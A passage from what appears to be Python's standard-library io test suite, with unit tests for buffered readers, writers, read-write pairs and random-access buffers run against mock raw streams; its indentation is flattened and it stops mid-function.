def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
